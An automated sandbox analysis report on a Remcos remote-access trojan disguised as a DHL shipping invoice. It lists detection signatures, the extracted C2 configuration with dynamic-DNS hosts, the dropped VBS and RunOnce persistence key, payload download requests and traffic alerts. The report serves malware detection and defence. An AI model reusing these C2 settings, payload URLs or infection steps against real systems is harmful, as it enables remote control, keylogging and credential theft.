Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe

Overview

General Information

Sample name:DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
Analysis ID:1586499
MD5:a25712989100fcdcb627446bcedb6c0a
SHA1:7577219dfedaaedff8b10dc274b97cff0f2788fb
SHA256:148b1248f6b89fa446d40890492bf0f9dddfa0b17d1cb9cad9fd84a0f9934890
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Deletes itself after installation
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["wealthabundance01.duckdns.org:3981:1", "wealthabundance01.duckdns.org:3980:0", "wealthabundance002..duckdns.org:3980:0"], "Assigned name": "2025BILLIONAIRES", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "wealthymannow-B8Y1BS", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000002.423794222336.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000003.423629557045.0000000002DEC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000004.00000003.423702210512.0000000002DEC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          Process Memory Space: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe PID: 9056JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
            Process Memory Space: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe PID: 9056JoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 1 entries

              System Summary

              barindex
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Reprokopists43\Surra.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, ProcessId: 9056, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Pocketer
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\hoaxbtopiw.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\hoaxbtopiw.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe", ParentImage: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, ParentProcessId: 9056, ParentProcessName: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\hoaxbtopiw.vbs" , ProcessId: 3592, ProcessName: wscript.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\hoaxbtopiw.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\hoaxbtopiw.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe", ParentImage: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, ParentProcessId: 9056, ParentProcessName: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\hoaxbtopiw.vbs" , ProcessId: 3592, ProcessName: wscript.exe
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\hoaxbtopiw.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\hoaxbtopiw.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe", ParentImage: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, ParentProcessId: 9056, ParentProcessName: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\hoaxbtopiw.vbs" , ProcessId: 3592, ProcessName: wscript.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Reprokopists43\Surra.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, ProcessId: 9056, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Pocketer
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\hoaxbtopiw.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\hoaxbtopiw.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe", ParentImage: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, ParentProcessId: 9056, ParentProcessName: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\hoaxbtopiw.vbs" , ProcessId: 3592, ProcessName: wscript.exe

              Stealing of Sensitive Information

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, ProcessId: 9056, TargetFilename: C:\ProgramData\remcos\logs.dat
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-09T08:37:41.675647+010020283713Unknown Traffic192.168.11.304983123.45.46.174443TCP
              2025-01-09T08:38:45.179468+010020283713Unknown Traffic192.168.11.304983923.45.46.174443TCP
              2025-01-09T08:41:54.682777+010020283713Unknown Traffic192.168.11.304984023.45.46.174443TCP
              2025-01-09T08:44:01.220472+010020283713Unknown Traffic192.168.11.304984123.45.46.174443TCP
              2025-01-09T08:46:07.736619+010020283713Unknown Traffic192.168.11.304984223.45.46.174443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-09T08:38:18.943128+010020365941Malware Command and Control Activity Detected192.168.11.304983343.226.229.2053981TCP
              2025-01-09T08:38:22.348584+010020365941Malware Command and Control Activity Detected192.168.11.304983543.226.229.2053981TCP
              2025-01-09T08:38:31.830812+010020365941Malware Command and Control Activity Detected192.168.11.304983743.226.229.2053981TCP
              2025-01-09T08:38:32.408801+010020365941Malware Command and Control Activity Detected192.168.11.304983843.226.229.2053981TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-09T08:38:21.750847+010028033043Unknown Traffic192.168.11.3049836178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-09T08:38:10.057116+010028032702Potentially Bad Traffic192.168.11.3049832109.99.162.14443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000004.00000002.423794222336.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["wealthabundance01.duckdns.org:3981:1", "wealthabundance01.duckdns.org:3980:0", "wealthabundance002..duckdns.org:3980:0"], "Assigned name": "2025BILLIONAIRES", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "wealthymannow-B8Y1BS", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: C:\Users\user\AppData\Local\Temp\Reprokopists43\Surra.batReversingLabs: Detection: 34%
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeReversingLabs: Detection: 34%
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeVirustotal: Detection: 45%Perma Link
              Source: Yara matchFile source: 00000004.00000002.423794222336.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.423629557045.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.423702210512.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe PID: 9056, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,5_2_00404423
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 109.99.162.14:443 -> 192.168.11.30:49832 version: TLS 1.2
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 2_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_004059CC
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 2_2_004065FD FindFirstFileW,FindClose,2_2_004065FD
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 2_2_00402868 FindFirstFileW,2_2_00402868
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_00402868 FindFirstFileW,4_2_00402868
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_004059CC
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_004065FD FindFirstFileW,FindClose,4_2_004065FD
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_346510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_346510F1
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_34656580 FindFirstFileExA,4_2_34656580
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0040AE51 FindFirstFileW,FindNextFileW,5_2_0040AE51
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407EF8
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407898

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.30:49838 -> 43.226.229.205:3981
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.30:49833 -> 43.226.229.205:3981
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.30:49835 -> 43.226.229.205:3981
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.30:49837 -> 43.226.229.205:3981
              Source: Malware configuration extractorURLs: wealthabundance01.duckdns.org
              Source: Malware configuration extractorURLs: wealthabundance01.duckdns.org
              Source: Malware configuration extractorURLs: wealthabundance002..duckdns.org
              Source: unknownDNS query: name: wealthabundance01.duckdns.org
              Source: global trafficTCP traffic: 192.168.11.30:49833 -> 43.226.229.205:3981
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 109.99.162.14 109.99.162.14
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: SOFTLAYERUS SOFTLAYERUS
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.11.30:49836 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49840 -> 23.45.46.174:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49841 -> 23.45.46.174:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49842 -> 23.45.46.174:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49831 -> 23.45.46.174:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49839 -> 23.45.46.174:443
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.30:49832 -> 109.99.162.14:443
              Source: global trafficHTTP traffic detected: GET /pefNPfIwXuOzWmfkZMUhyE10.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /pefNPfIwXuOzWmfkZMUhyE10.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423808236953.0000000034620000.00000040.10000000.00040000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000002.423683491300.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000002.423683491300.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000005.00000003.423701119261.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000005.00000002.423702586488.0000000000B4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16.0.14326&p=0&a=1&hm=1&sp=0&fpEnabled=1https://odc.officeapps.live.com/odc/v2.1/hrdhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000005.00000003.423701119261.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000005.00000002.423702586488.0000000000B4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16.0.14326&p=0&a=1&hm=1&sp=0&fpEnabled=1https://odc.officeapps.live.com/odc/v2.1/hrdhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423807908275.0000000034530000.00000040.10000000.00040000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423807908275.0000000034530000.00000040.10000000.00040000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: teldrum.ro
              Source: global trafficDNS traffic detected: DNS query: wealthabundance01.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://c.pki.goog/r/r1.crl0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://c.pki.goog/wr2/oBFYYahzgVI.crl0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423525690276.0000000002DF3000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423794222336.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423629557045.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423702210512.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423525561250.0000000002DF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423525690276.0000000002DF3000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423794222336.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423629557045.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423702210512.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423525561250.0000000002DF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhv3B50.tmp.5.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
